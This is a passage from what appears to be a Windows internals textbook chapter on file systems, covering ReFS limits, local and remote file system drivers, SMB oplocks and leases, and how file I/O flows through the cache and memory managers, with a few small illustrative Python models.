engine, is portable, and uses different data structures and algorithms compared to NTFS. (Minstore
uses B+ trees.)
One of the important design goals of ReFS was to be able to support huge volumes (that could have
been created by Storage Spaces). Like NTFS, ReFS uses 64-bit cluster numbers and can address volumes
of up to 16 exaclusters. ReFS has no limitation on the size of the addressable values, so, theoretically, ReFS
is able to manage volumes of up to 1 yottabyte (using 64 KB cluster sizes).
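The yottabyte figure follows from the same kind of arithmetic as the NTFS limit (here a binary yobibyte, 2^80 bytes):

```python
# 64-bit cluster numbers with 64 KB clusters, as described for ReFS.
max_bytes = 2 ** 64 * 64 * 1024   # 2^64 clusters * 2^16 bytes per cluster
print(max_bytes == 2 ** 80)       # one yobibyte
```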
Unlike NTFS, Minstore doesn’t need a central location to store its own metadata on the volume
(although the object table could be considered somewhat centralized) and has no limitations on
addressable values, so there is no need to support many different sized clusters. ReFS supports only
4 KB and 64 KB cluster sizes. ReFS, at the time of this writing, does not support DAX volumes.
We describe NTFS and ReFS data structures and their advanced features in detail later in this chapter.
File system driver architecture
File system drivers (FSDs) manage file system formats. Although FSDs run in kernel mode, they differ
in a number of ways from standard kernel-mode drivers. Perhaps most significant, they must register
as an FSD with the I/O manager, and they interact more extensively with the memory manager. For
enhanced performance, file system drivers also usually rely on the services of the cache manager. Thus,
they use a superset of the exported Ntoskrnl.exe functions that standard drivers use. Just as for stan-
dard kernel-mode drivers, you must have the Windows Driver Kit (WDK) to build file system drivers.
(See Chapter 1, “Concepts and Tools,” in Part 1 and http://www.microsoft.com/whdc/devtools/wdk for
more information on the WDK.)
Windows has two different types of FSDs:
■ Local FSDs manage volumes directly connected to the computer.
■ Network FSDs allow users to access data volumes connected to remote computers.
Local FSDs
Local FSDs include Ntfs.sys, Refs.sys, Refsv1.sys, Fastfat.sys, Exfat.sys, Udfs.sys, Cdfs.sys, and the RAW
FSD (integrated in Ntoskrnl.exe). Figure 11-17 shows a simplified view of how local FSDs interact with the
I/O manager and storage device drivers. A local FSD is responsible for registering with the I/O manager.
Once the FSD is registered, the I/O manager can call on it to perform volume recognition when appli-
cations or the system initially access the volumes. Volume recognition involves an examination of a vol-
ume’s boot sector and often, as a consistency check, the file system metadata. If none of the registered
file systems recognizes the volume, the system assigns the RAW file system driver to the volume and
then displays a dialog box to the user asking if the volume should be formatted. If the user chooses not
to format the volume, the RAW file system driver provides access to the volume, but only at the sector
level—in other words, the user can only read or write complete sectors.
The goal of file system recognition is to allow the system to have an additional option for a valid
but unrecognized file system other than RAW. To achieve this, the system defines a fixed data structure
type (FILE_SYSTEM_RECOGNITION_STRUCTURE) that is written to the first sector on the volume. This
data structure, if present, would be recognized by the operating system, which would then notify the
user that the volume contains a valid but unrecognized file system. The system will still load the RAW
file system on the volume, but it will not prompt the user to format the volume. A user application or
kernel-mode driver might ask for a copy of the FILE_SYSTEM_RECOGNITION_STRUCTURE by using the
new file system I/O control code FSCTL_QUERY_FILE_SYSTEM_RECOGNITION.
The first sector of every Windows-supported file system format is reserved as the volume’s boot
sector. A boot sector contains enough information so that a local FSD can both identify the volume on
which the sector resides as containing a format that the FSD manages and locate any other metadata
necessary to identify where metadata is stored on the volume.
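As a rough illustration of volume recognition, the sketch below matches a boot sector against well-known identifiers (NTFS and exFAT carry an OEM string at byte offset 3; the FAT32 and FAT12/16 layouts carry a type string at offsets 82 and 54, respectively). Real FSDs also validate file system metadata before claiming a volume, as noted above:

```python
def recognize_volume(boot_sector: bytes):
    """Very simplified volume recognition: match known boot-sector signatures."""
    checks = [
        ("NTFS",  3,  b"NTFS    "),    # OEM ID
        ("exFAT", 3,  b"EXFAT   "),    # OEM ID
        ("FAT32", 82, b"FAT32   "),    # BS_FilSysType, FAT32 BPB layout
        ("FAT",   54, b"FAT"),         # BS_FilSysType, FAT12/16 BPB layout
    ]
    for name, offset, sig in checks:
        if boot_sector[offset:offset + len(sig)] == sig:
            return name
    return "RAW"                       # unrecognized: sector-level access only

sector = bytearray(512)
sector[3:11] = b"NTFS    "
print(recognize_volume(bytes(sector)))   # NTFS
```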
When a local FSD (shown in Figure 11-17) recognizes a volume, it creates a device object that rep-
resents the mounted file system format. The I/O manager makes a connection through the volume
parameter block (VPB) between the volume’s device object (which is created by a storage device driver)
and the device object that the FSD created. The VPB’s connection results in the I/O manager redirecting
I/O requests targeted at the volume device object to the FSD device object.
[Figure: applications in user mode issue requests against a logical volume (partition); in kernel mode the I/O manager routes them through the file system driver to the storage device drivers]
FIGURE 11-17 Local FSD.
To improve performance, local FSDs usually use the cache manager to cache file system data, in-
cluding metadata. FSDs also integrate with the memory manager so that mapped files are implement-
ed correctly. For example, FSDs must query the memory manager whenever an application attempts to
truncate a file to verify that no processes have mapped the part of the file beyond the truncation point.
(See Chapter 5 of Part 1 for more information on the memory manager.) Windows doesn’t permit file
data that is mapped by an application to be deleted either through truncation or file deletion.
Local FSDs also support file system dismount operations, which permit the system to disconnect the
FSD from the volume object. A dismount occurs whenever an application requires raw access to the
on-disk contents of a volume or the media associated with a volume is changed. The first time an ap-
plication accesses the media after a dismount, the I/O manager reinitiates a volume mount operation
for the media.
Remote FSDs
Each remote FSD consists of two components: a client and a server. A client-side remote FSD allows
applications to access remote files and directories. The client FSD component accepts I/O requests
from applications and translates them into network file system protocol commands (such as SMB)
that the FSD sends across the network to a server-side component, which is a remote FSD. A server-
side FSD listens for commands coming from a network connection and fulfills them by issuing I/O
requests to the local FSD that manages the volume on which the file or directory that the command
is intended for resides.
Windows includes a client-side remote FSD named LANMan Redirector (usually referred to as
just the redirector) and a server-side remote FSD named LANMan Server (%SystemRoot%\System32
\Drivers\Srv2.sys). Figure 11-18 shows the relationship between a client accessing files remotely from a
server through the redirector and server FSDs.
[Figure: on the client, an application calls through Kernel32.dll and Ntdll.dll into the redirector FSD, which works with the cache manager and sends commands through a protocol driver (WSK transport) across the network; on the server, a protocol driver hands the commands to the server FSD, which uses the cache manager and the local FSD (NTFS, FAT) to access file data on disk]
FIGURE 11-18 Common Internet File System file sharing.
Windows relies on the Common Internet File System (CIFS) protocol to format messages exchanged
between the redirector and the server. CIFS is a version of Microsoft’s Server Message Block (SMB)
protocol. (For more information on SMB, go to https://docs.microsoft.com/en-us/windows/win32/fileio
/microsoft-smb-protocol-and-cifs-protocol-overview.)
Like local FSDs, client-side remote FSDs usually use cache manager services to locally cache file data
belonging to remote files and directories, and in such cases both must implement a distributed locking
mechanism on the client as well as the server. SMB client-side remote FSDs implement a distributed cache
coherency protocol, called oplock (opportunistic locking), so that the data an application sees when it
accesses a remote file is the same as the data applications running on other computers that are accessing
the same file see. Third-party file systems may choose to use the oplock protocol, or they may implement
their own protocol. Although server-side remote FSDs participate in maintaining cache coherency across
their clients, they don’t cache data from the local FSDs because local FSDs cache their own data.
It is fundamental that whenever a resource can be shared between multiple, simultaneous acces-
sors, a serialization mechanism must be provided to arbitrate writes to that resource to ensure that only
one accessor is writing to the resource at any given time. Without this mechanism, the resource may
be corrupted. The locking mechanisms used by all file servers implementing the SMB protocol are the
oplock and the lease. Which mechanism is used depends on the capabilities of both the server and the
client, with the lease being the preferred mechanism.
Oplocks
The oplock functionality is implemented in the file system run-time library (FsRtlXxx
functions) and may be used by any file system driver. The client of a remote file server uses an oplock to
dynamically determine which client-side caching strategy to use to minimize network traffic. An oplock
is requested on a file residing on a share, by the file system driver or redirector, on behalf of an applica-
tion when it attempts to open a file. The granting of an oplock allows the client to cache the file rather
than send every read or write to the file server across the network. For example, a client could open a
file for exclusive access, allowing the client to cache all reads and writes to the file, and then copy the
updates to the file server when the file is closed. In contrast, if the server does not grant an oplock to a
client, all reads and writes must be sent to the server.
Once an oplock has been granted, a client may then start caching the file, with the type of oplock
determining what type of caching is allowed. An oplock is not necessarily held until a client is finished
with the file, and it may be broken at any time if the server receives an operation that is incompatible with
the existing granted locks. This implies that the client must be able to quickly react to the break of the
oplock and change its caching strategy dynamically.
Prior to SMB 2.1, there were four types of oplocks:
■ Level 1, exclusive access  This lock allows a client to open a file for exclusive access. The client may perform read-ahead buffering and read or write caching.
■ Level 2, shared access  This lock allows multiple, simultaneous readers of a file and no writers. The client may perform read-ahead buffering and read caching of file data and attributes. A write to the file will cause the holders of the lock to be notified that the lock has been broken.
■ Batch, exclusive access  This lock takes its name from the locking used when processing batch (.bat) files, which are opened and closed to process each line within the file. The client may keep a file open on the server, even though the application has (perhaps temporarily) closed the file. This lock supports read, write, and handle caching.
■ Filter, exclusive access  This lock provides applications and file system filters with a mechanism to give up the lock when other clients try to access the same file, but unlike a Level 2 lock, the file cannot be opened for delete access, and the other client will not receive a sharing violation. This lock supports read and write caching.
In the simplest terms, if multiple client systems are all caching the same file shared by a server,
then as long as every application accessing the file (from any client or the server) tries only to read the
file, those reads can be satisfied from each system’s local cache. This drastically reduces the network
traffic because the contents of the file aren’t sent to each system from the server. Locking information
must still be exchanged between the client systems and the server, but this requires very low network
bandwidth. However, if even one of the clients opens the file for read and write access (or exclusive
write), then none of the clients can use their local caches and all I/O to the file must go immediately
to the server, even if the file is never written. (Lock modes are based upon how the file is opened, not
individual I/O requests.)
An example, shown in Figure 11-19, will help illustrate oplock operation. The server automatically
grants a Level 1 oplock to the first client to open a server file for access. The redirector on the client
caches the file data for both reads and writes in the file cache of the client machine. If a second client
opens the file, it too requests a Level 1 oplock. However, because there are now two clients accessing
the same file, the server must take steps to present a consistent view of the file’s data to both clients.
If the first client has written to the file, as is the case in Figure 11-19, the server revokes its oplock and
grants neither client an oplock. When the first client’s oplock is revoked, or broken, the client flushes
any data it has cached for the file back to the server.
[Figure: timeline of two clients and a server. Client 1 opens the file and requests an oplock; the server grants a Level 1 oplock, and Client 1 performs cached reads and writes. Client 2 then opens the same file and requests an oplock; because Client 1 has written to the file, the server breaks Client 1 to no oplock and does not grant Client 2 an oplock. Client 1 flushes its cached modified data to the server, and both clients continue with noncached reads and writes]
FIGURE 11-19 Oplock example.
If the first client hadn’t written to the file, the first client’s oplock would have been broken to a
Level 2 oplock, which is the same type of oplock the server would grant to the second client. Now both
clients can cache reads, but if either writes to the file, the server revokes their oplocks so that non-
cached operation commences. Once oplocks are broken, they aren’t granted again for the same open
instance of a file. However, if a client closes a file and then reopens it, the server reassesses what level of
oplock to grant the client based on which other clients have the file open and whether at least one of
them has written to the file.
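The grant-and-break behavior described above can be modeled as a toy state machine. This is a deliberate simplification (it ignores sharing modes, open instances, and the Batch and Filter types) intended only to mirror the Level 1 / Level 2 / no-oplock transitions in Figure 11-19:

```python
class OplockServer:
    """Toy model of pre-SMB 2.1 oplock granting."""
    def __init__(self):
        self.grants = {}        # client -> "level1" | "level2" | None
        self.written = False    # has any holder written to the file?

    def open_file(self, client):
        if not self.grants:                        # first opener gets Level 1
            self.grants[client] = "level1"
        elif self.written:                         # a write occurred: revoke all,
            self.grants = {c: None for c in self.grants}
            self.grants[client] = None             # grant no one an oplock
        else:                                      # readers only: break to Level 2
            self.grants = {c: "level2" for c in self.grants}
            self.grants[client] = "level2"
        return self.grants[client]

    def write(self, client):
        self.written = True    # cached writes eventually force noncached operation

srv = OplockServer()
print(srv.open_file("client1"))   # level1
srv.write("client1")
print(srv.open_file("client2"))   # None: Level 1 revoked after a write
```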
EXPERIMENT: Viewing the list of registered file systems
When the I/O manager loads a device driver into memory, it typically names the driver object
it creates to represent the driver so that it’s placed in the \Driver object manager directory. The
driver objects for any driver the I/O manager loads that have a Type attribute value of SERVICE_
FILE_SYSTEM_DRIVER (2) are placed in the \FileSystem directory by the I/O manager. Thus, using
a tool such as WinObj (from Sysinternals), you can see the file systems that have registered on a
system, as shown in the following screenshot. Note that file system filter drivers will also show up
in this list. Filter drivers are described later in this section.
Another way to see registered file systems is to run the System Information viewer. Run
Msinfo32 from the Start menu’s Run dialog box and select System Drivers under Software
Environment. Sort the list of drivers by clicking the Type column, and drivers with a Type attri-
bute of SERVICE_FILE_SYSTEM_DRIVER group together.
Note that just because a driver registers as a file system driver type doesn’t mean that it is
a local or remote FSD. For example, Npfs (Named Pipe File System) is a driver that implements
named pipes through a file system-like private namespace. As mentioned previously, this list will
also include file system filter drivers.
Leases
Prior to SMB 2.1, the SMB protocol assumed an error-free network connection between
the client and the server and did not tolerate network disconnections caused by transient network
failures, server reboot, or cluster failovers. When a network disconnect event was received by the cli-
ent, it orphaned all handles opened to the affected server(s), and all subsequent I/O operations on the
orphaned handles were failed. Similarly, the server would release all opened handles and resources
associated with the disconnected user session. This behavior resulted in applications losing state and in
unnecessary network traffic.
In SMB 2.1, the concept of a lease is introduced as a new type of client caching mechanism, similar to
an oplock. The purpose of a lease and an oplock is the same, but a lease provides greater flexibility and
much better performance.
Four lease types are defined:
■ Read (R), shared access  Allows multiple simultaneous readers of a file, and no writers. This lease allows the client to perform read-ahead buffering and read caching.
■ Read-Handle (RH), shared access  This is similar to the Level 2 oplock, with the added benefit of allowing the client to keep a file open on the server even though the accessor on the client has closed the file. (The cache manager will lazily flush the unwritten data and purge the unmodified cache pages based on memory availability.) This is superior to a Level 2 oplock because the lease does not need to be broken between opens and closes of the file handle. (In this respect, it provides semantics similar to the Batch oplock.) This type of lease is especially useful for files that are repeatedly opened and closed because the cache is not invalidated when the file is closed and refilled when the file is opened again, providing a big improvement in performance for complex I/O intensive applications.
■ Read-Write (RW), exclusive access  This lease allows a client to open a file for exclusive access. This lock allows the client to perform read-ahead buffering and read or write caching.
■ Read-Write-Handle (RWH), exclusive access  This lock allows a client to open a file for exclusive access. This lease supports read, write, and handle caching (similar to the Read-Handle lease).
Another advantage that a lease has over an oplock is that a file may be cached, even when there are
multiple handles opened to the file on the client. (This is a common behavior in many applications.) This
is implemented through the use of a lease key (implemented using a GUID), which is created by the client
and associated with the File Control Block (FCB) for the cached file, allowing all handles to the same file to
share the same lease state, which provides caching by file rather than caching by handle. Prior to the in-
troduction of the lease, the oplock was broken whenever a new handle was opened to the file, even from
the same client. Figure 11-20 shows the oplock behavior, and Figure 11-21 shows the new lease behavior.
Prior to SMB 2.1, oplocks could only be granted or broken, but leases can also be converted. For
example, a Read lease may be converted to a Read-Write lease, which greatly reduces network traffic
because the cache for a particular file does not need to be invalidated and refilled, as would be the case
with an oplock break (of the Level 2 oplock), followed by the request and grant of a Level 1 oplock.
[Figure: timeline of client, network, and server activity with an oplock. Application A opens a file for read/write access and the server grants a Batch oplock; A's reads and writes within the cached area generate no network packets. When application B on the same client opens the same file for read access, the server opens a second handle and the Batch oplock is broken; the cache is flushed, no more caching is allowed on the file, and A's subsequent reads and writes of previously cached areas go to the server]
FIGURE 11-20 Oplock with multiple handles from the same client.
[Figure: the same sequence with a lease. Application A is granted a Read-Handle lease; when application B on the same client opens the file, the server opens a second handle but the lease remains in force. Both applications' reads and writes within the cached area are satisfied from the client cache with no network packets, and data written to the cache is eventually flushed to the server by the client]
FIGURE 11-21 Lease with multiple handles from the same client.
File system operations
Applications and the system access files in two ways: directly, via file I/O functions (such as ReadFile
and WriteFile), and indirectly, by reading or writing a portion of their address space that represents a
mapped file section. (See Chapter 5 of Part 1 for more information on mapped files.) Figure 11-22 is a
simplified diagram that shows the components involved in these file system operations and the ways in
which they interact. As you can see, an FSD can be invoked through several paths:
■ From a user or system thread performing explicit file I/O
■ From the memory manager’s modified and mapped page writers
■ Indirectly from the cache manager’s lazy writer
■ Indirectly from the cache manager’s read-ahead thread
■ From the memory manager’s page fault handler
[Figure 11-22 diagrams the data structures involved: a process's handle table, through object manager data structures, references file objects; each file object points into NTFS data structures (a file control block with its data attribute and a named stream, plus stream control blocks), which in turn reference the master file table within the on-disk NTFS database.]
FIGURE 11-22 Components involved in file system I/O.
The following sections describe the circumstances surrounding each of these scenarios and the
steps FSDs typically take in response to each one. You’ll see how much FSDs rely on the memory man-
ager and the cache manager.
Explicit file I/O
The most obvious way an application accesses files is by calling Windows I/O functions such as
CreateFile, ReadFile, and WriteFile. An application opens a file with CreateFile and then reads, writes,
or deletes the file by passing the handle returned from CreateFile to other Windows functions. The
CreateFile function, which is implemented in the Kernel32.dll Windows client-side DLL, invokes the
native function NtCreateFile, forming a complete root-relative path name for the path that the applica-
tion passed to it (processing “.” and “..” symbols in the path name) and prefixing the path with “\??” (for
example, \??\C:\Daryl\Todo.txt).
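The path normalization described above can be sketched as a small model. This is illustrative Python, not the actual Kernel32 code; the helper name `to_native_path` is invented for this sketch, and it only handles the "." / ".." processing and "\??" prefixing the text mentions.

```python
import ntpath

def to_native_path(dos_path: str) -> str:
    # Split "C:\Daryl\.\Todo.txt" into drive ("C:") and the rest of the path.
    drive, rest = ntpath.splitdrive(dos_path)
    parts = []
    for comp in rest.split("\\"):
        if comp in ("", "."):
            continue            # skip empty and current-directory components
        if comp == "..":
            if parts:
                parts.pop()     # ".." cancels the previous component
            continue
        parts.append(comp)
    # Prefix the root-relative result with "\??", as NtCreateFile expects.
    return "\\??\\" + drive + "\\" + "\\".join(parts)

assert to_native_path(r"C:\Daryl\.\Todo.txt") == r"\??\C:\Daryl\Todo.txt"
assert to_native_path(r"C:\Daryl\tmp\..\Todo.txt") == r"\??\C:\Daryl\Todo.txt"
```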
The NtCreateFile system service uses ObOpenObjectByName to open the file, which parses the
name starting with the object manager root directory and the first component of the path name (“??”).
Chapter 8, “System mechanisms”, includes a thorough description of object manager name resolution
and its use of process device maps, but we’ll review the steps it follows here with a focus on volume
drive letter lookup.
The first step the object manager takes is to translate \?? to the process’s per-session namespace di-
rectory that the DosDevicesDirectory field of the device map structure in the process object references
(which was propagated from the first process in the logon session by using the logon session referenc-
es field in the logon session’s token). Only volume names for network shares and drive letters mapped
by the Subst.exe utility are typically stored in the per-session directory, so on those systems when a
name (C: in this example) is not present in the per-session directory, the object manager restarts its
search in the directory referenced by the GlobalDosDevicesDirectory field of the device map associated
with the per-session directory. The GlobalDosDevicesDirectory field always points at the \GLOBAL?? di-
rectory, which is where Windows stores volume drive letters for local volumes. (See the section “Session
namespace” in Chapter 8 for more information.) Processes can also have their own device map, which is
an important characteristic during impersonation over protocols such as RPC.
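The two-step lookup the object manager performs can be modeled as a simple fallback between two directories. This is a toy sketch, not the real device-map structures; the function and dictionary names are invented for illustration.

```python
def resolve_symlink(name, per_session, global_dir):
    # Try the per-session DosDevices directory first (SUBST drives,
    # mapped network shares typically live here) ...
    if name in per_session:
        return per_session[name]
    # ... then fall back to the \GLOBAL?? directory, where Windows
    # stores drive letters for local volumes.
    return global_dir.get(name)

per_session = {"Z:": r"\Device\LanmanRedirector\server\share"}
global_dir = {"C:": r"\Device\HarddiskVolume6"}

assert resolve_symlink("Z:", per_session, global_dir).startswith(r"\Device\Lanman")
assert resolve_symlink("C:", per_session, global_dir) == r"\Device\HarddiskVolume6"
```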
The symbolic link for a volume drive letter points to a volume device object under \Device, so when
the object manager encounters the volume object, the object manager hands the rest of the path
name to the parse function that the I/O manager has registered for device objects, IopParseDevice.
(In volumes on dynamic disks, a symbolic link points to an intermediary symbolic link, which points
to a volume device object.) Figure 11-23 shows how volume objects are accessed through the object
manager namespace. The figure shows how the \GLOBAL??\C: symbolic link points to the \Device\
HarddiskVolume6 volume device object.
After locking the caller’s security context and obtaining security information from the caller’s token,
IopParseDevice creates an I/O request packet (IRP) of type IRP_MJ_CREATE, creates a file object that
stores the name of the file being opened, follows the VPB of the volume device object to find the vol-
ume’s mounted file system device object, and uses IoCallDriver to pass the IRP to the file system driver
that owns the file system device object.
When an FSD receives an IRP_MJ_CREATE IRP, it looks up the specified file, performs security valida-
tion, and if the file exists and the user has permission to access the file in the way requested, returns
a success status code. The object manager creates a handle for the file object in the process’s handle
table, and the handle propagates back through the calling chain, finally reaching the application as a
return parameter from CreateFile. If the file system fails the create operation, the I/O manager deletes
the file object it created for the file.
We’ve skipped over the details of how the FSD locates the file being opened on the volume, but
a ReadFile function call operation shares many of the FSD’s interactions with the cache manager and
storage driver. Both ReadFile and CreateFile are system calls that map to I/O manager functions, but
the NtReadFile system service doesn’t need to perform a name lookup; it calls on the object manager
to translate the handle passed from ReadFile into a file object pointer. If the handle indicates that the
caller obtained permission to read the file when the file was opened, NtReadFile proceeds to create an
IRP of type IRP_MJ_READ and sends it to the FSD for the volume on which the file resides. NtReadFile
obtains the FSD’s device object, which is stored in the file object, and calls IoCallDriver, and the I/O
manager locates the FSD from the device object and gives the IRP to the FSD.
FIGURE 11-23 Drive-letter name resolution.
If the file being read can be cached (that is, the FILE_FLAG_NO_BUFFERING flag wasn’t passed to
CreateFile when the file was opened), the FSD checks to see whether caching has already been initiated
for the file object. The PrivateCacheMap field in a file object points to a private cache map data struc-
ture (which we described in the previous section) if caching is initiated for a file object. If the FSD hasn’t
initialized caching for the file object (which it does the first time a file object is read from or written to),
the PrivateCacheMap field will be null. The FSD calls the cache manager’s CcInitializeCacheMap function
to initialize caching, which involves the cache manager creating a private cache map and, if another file
object referring to the same file hasn’t initiated caching, a shared cache map and a section object.
After it has verified that caching is enabled for the file, the FSD copies the requested file data from
the cache manager’s virtual memory to the buffer that the thread passed to the ReadFile function. The
file system performs the copy within a try/except block so that it catches any faults that are the result of
an invalid application buffer. The function the file system uses to perform the copy is the cache man-
ager’s CcCopyRead function. CcCopyRead takes as parameters a file object, file offset, and length.
When the cache manager executes CcCopyRead, it retrieves a pointer to a shared cache map, which
is stored in the file object. Recall that a shared cache map stores pointers to virtual address control
blocks (VACBs), with one VACB entry for each 256 KB block of the file. If the VACB pointer for a portion
of a file being read is null, CcCopyRead allocates a VACB, reserving a 256 KB view in the cache man-
ager’s virtual address space, and maps (using MmMapViewInSystemCache) the specified portion of the
file into the view. Then CcCopyRead simply copies the file data from the mapped view to the buffer it
was passed (the buffer originally passed to ReadFile). If the file data isn’t in physical memory, the copy
operation generates page faults, which are serviced by MmAccessFault.
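The VACB bookkeeping just described can be sketched as a toy model (heavily simplified, and in Python rather than kernel C): one slot per 256 KB block of the file, a null slot meaning no view is mapped yet, and a view "mapped" on demand before the copy proceeds.

```python
VIEW_SIZE = 256 * 1024

class SharedCacheMap:
    def __init__(self, file_size):
        nviews = (file_size + VIEW_SIZE - 1) // VIEW_SIZE
        self.vacbs = [None] * nviews      # one VACB slot per 256 KB block
        self.maps = 0                     # how many views we had to map

    def copy_read(self, offset, length, backing):
        out = bytearray()
        pos = offset
        while pos < offset + length:
            idx = pos // VIEW_SIZE
            if self.vacbs[idx] is None:   # no view yet: map this block now
                start = idx * VIEW_SIZE
                self.vacbs[idx] = backing[start:start + VIEW_SIZE]
                self.maps += 1
            view = self.vacbs[idx]
            in_view = pos - idx * VIEW_SIZE
            take = min(VIEW_SIZE - in_view, offset + length - pos)
            out += view[in_view:in_view + take]
            pos += take
        return bytes(out)

data = bytes(range(256)) * 4096           # a 1 MB "file"
scm = SharedCacheMap(len(data))
assert scm.copy_read(300_000, 10, data) == data[300_000:300_010]
assert scm.maps == 1                      # the read fell inside one 256 KB view
```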
When a page fault occurs, MmAccessFault examines the virtual address that caused the fault and
locates the virtual address descriptor (VAD) in the VAD tree of the process that caused the fault. (See
Chapter 5 of Part 1 for more information on VAD trees.) In this scenario, the VAD describes the cache
manager’s mapped view of the file being read, so MmAccessFault calls MiDispatchFault to handle a page
fault on a valid virtual memory address. MiDispatchFault locates the control area (which the VAD points
to) and through the control area finds a file object representing the open file. (If the file has been opened
more than once, there might be a list of file objects linked through pointers in their private cache maps.)
With the file object in hand, MiDispatchFault calls the I/O manager function IoPageRead to build
an IRP (of type IRP_MJ_READ) and sends the IRP to the FSD that owns the device object the file object
points to. Thus, the file system is reentered to read the data that it requested via CcCopyRead, but this
time the IRP is marked as noncached and paging I/O. These flags signal the FSD that it should retrieve
file data directly from disk, and it does so by determining which clusters on disk contain the requested
data (the exact mechanism is file-system dependent) and sending IRPs to the volume manager that
owns the volume device object on which the file resides. The volume parameter block (VPB) field in the
FSD’s device object points to the volume device object.
The memory manager waits for the FSD to complete the IRP read and then returns control to
the cache manager, which continues the copy operation that was interrupted by a page fault. When
CcCopyRead completes, the FSD returns control to the thread that called NtReadFile, having copied the
requested file data, with the aid of the cache manager and the memory manager, to the thread’s buffer.
The path for WriteFile is similar except that the NtWriteFile system service generates an IRP of type
IRP_MJ_WRITE, and the FSD calls CcCopyWrite instead of CcCopyRead. CcCopyWrite, like CcCopyRead,
ensures that the portions of the file being written are mapped into the cache and then copies to the
cache the buffer passed to WriteFile.
If a file’s data is already cached (in the system’s working set), there are several variants on the
scenario we’ve just described. If a file’s data is already stored in the cache, CcCopyRead doesn’t incur
page faults. Also, under certain conditions, NtReadFile and NtWriteFile call an FSD’s fast I/O entry point
instead of immediately building and sending an IRP to the FSD. Some of these conditions follow: the
portion of the file being read must reside in the first 4 GB of the file, the file can have no locks, and
the portion of the file being read or written must fall within the file’s currently allocated size.
The fast I/O read and write entry points for most FSDs call the cache manager’s CcFastCopyRead
and CcFastCopyWrite functions. These variants on the standard copy routines ensure that the file’s
data is mapped in the file system cache before performing a copy operation. If this condition isn’t met,
CcFastCopyRead and CcFastCopyWrite indicate that fast I/O isn’t possible. When fast I/O isn’t possible,
NtReadFile and NtWriteFile fall back on creating an IRP. (See the earlier section “Fast I/O” for a more
complete description of fast I/O.)
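The eligibility test sketched below captures the conditions listed above (the real checks are more involved; the function name and exact parameterization are invented for this sketch): fast I/O is attempted only when the request falls in the first 4 GB, the file has no locks, and the range lies within the file's currently allocated size.

```python
FOUR_GB = 4 * 1024 ** 3

def can_try_fast_io(offset, length, allocated_size, has_locks):
    if has_locks:
        return False                       # byte-range locks rule out fast I/O
    if offset + length > FOUR_GB:
        return False                       # request must lie in the first 4 GB
    return offset + length <= allocated_size  # and within the allocated size

assert can_try_fast_io(0, 4096, 1 << 20, has_locks=False)
assert not can_try_fast_io(0, 4096, 1 << 20, has_locks=True)
assert not can_try_fast_io(FOUR_GB, 10, FOUR_GB * 2, has_locks=False)
```

When the check fails, the model corresponds to NtReadFile and NtWriteFile falling back on building an IRP.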
Memory manager’s modified and mapped page writer
The memory manager’s modified and mapped page writer threads wake up periodically (and when
available memory runs low) to flush modified pages to their backing store on disk. The threads call
IoAsynchronousPageWrite to create IRPs of type IRP_MJ_WRITE and write pages to either a paging file
or a file that was modified after being mapped. Like the IRPs that MiDispatchFault creates, these IRPs
are flagged as noncached and paging I/O. Thus, an FSD bypasses the file system cache and issues IRPs
directly to a storage driver to write the memory to disk.
Cache manager’s lazy writer
The cache manager’s lazy writer thread also plays a role in writing modified pages because it periodi-
cally flushes views of file sections mapped in the cache that it knows are dirty. The flush operation,
which the cache manager performs by calling MmFlushSection, triggers the memory manager to write
any modified pages in the portion of the section being flushed to disk. Like the modified and mapped
page writers, MmFlushSection uses IoSynchronousPageWrite to send the data to the FSD.
Cache manager’s read-ahead thread
A cache uses two artifacts of how programs reference code and data: temporal locality and spatial
locality. The underlying concept behind temporal locality is that if a memory location is referenced,
it is likely to be referenced again soon. The idea behind spatial locality is that if a memory location is
referenced, other nearby locations are also likely to be referenced soon. Thus, a cache typically is very
good at speeding up access to memory locations that have been accessed in the near past, but it’s ter-
rible at speeding up access to areas of memory that have not yet been accessed (it has zero lookahead
capability). In an attempt to populate the cache with data that will likely be used soon, the cache man-
ager implements two mechanisms: a read-ahead thread and Superfetch.
As we described in the previous section, the cache manager includes a thread that is responsible for
attempting to read data from files before an application, a driver, or a system thread explicitly requests
it. The read-ahead thread uses the history of read operations that were performed on a file, which
are stored in a file object’s private cache map, to determine how much data to read. When the thread
performs a read-ahead, it simply maps the portion of the file it wants to read into the cache (allocating
VACBs as necessary) and touches the mapped data. The page faults caused by the memory accesses
invoke the page fault handler, which reads the pages into the system’s working set.
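History-driven read-ahead can be illustrated with a model far simpler than the real private-cache-map logic (the class, field names, and growth policy here are all assumptions of this sketch): remember the previous read, and if the current read continues it sequentially, prefetch a growing amount past the current position.

```python
class ReadHistory:
    def __init__(self):
        self.last = None           # (offset, length) of the previous read
        self.ahead = 0             # current read-ahead granularity in bytes

    def on_read(self, offset, length):
        sequential = (self.last is not None
                      and offset == self.last[0] + self.last[1])
        if sequential:
            self.ahead = max(64 * 1024, self.ahead * 2)  # grow the window
        else:
            self.ahead = 0                               # pattern broken
        self.last = (offset, length)
        return self.ahead          # bytes to prefetch after this read

h = ReadHistory()
assert h.on_read(0, 4096) == 0          # first read: no history yet
assert h.on_read(4096, 4096) == 65536   # sequential: start reading ahead
assert h.on_read(8192, 4096) == 131072  # still sequential: read ahead more
assert h.on_read(0, 4096) == 0          # random access: stop prefetching
```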
A limitation of the read-ahead thread is that it works only on open files. Superfetch was added to
Windows to proactively add files to the cache before they’re even opened. Specifically, the memory
manager sends page-usage information to the Superfetch service (%SystemRoot%\System32\Sysmain.
dll), and a file system minifilter provides file name resolution data. The Superfetch service attempts
to find file-usage patterns—for example, payroll is run every Friday at 12:00, or Outlook is run every
morning at 8:00. When these patterns are derived, the information is stored in a database and tim-
ers are requested. Just prior to the time the file would most likely be used, a timer fires and tells the
memory manager to read the file into low-priority memory (using low-priority disk I/O). If the file is
then opened, the data is already in memory, and there’s no need to wait for the data to be read from
disk. If the file isn’t opened, the low-priority memory will be reclaimed by the system. The internals and
full description of the Superfetch service were previously described in Chapter 5, Part 1.
Memory manager’s page fault handler
We described how the page fault handler is used in the context of explicit file I/O and cache manager
read-ahead, but it’s also invoked whenever any application accesses virtual memory that is a view of
a mapped file and encounters pages that represent portions of a file that aren’t yet in memory. The
memory manager’s MmAccessFault handler follows the same steps it does when the cache manager
generates a page fault from CcCopyRead or CcCopyWrite, sending IRPs via IoPageRead to the file sys-
tem on which the file is stored.
File system filter drivers and minifilters
A filter driver that layers over a file system driver is called a file system filter driver. Two types of file
system filter drivers are supported by the Windows I/O model:
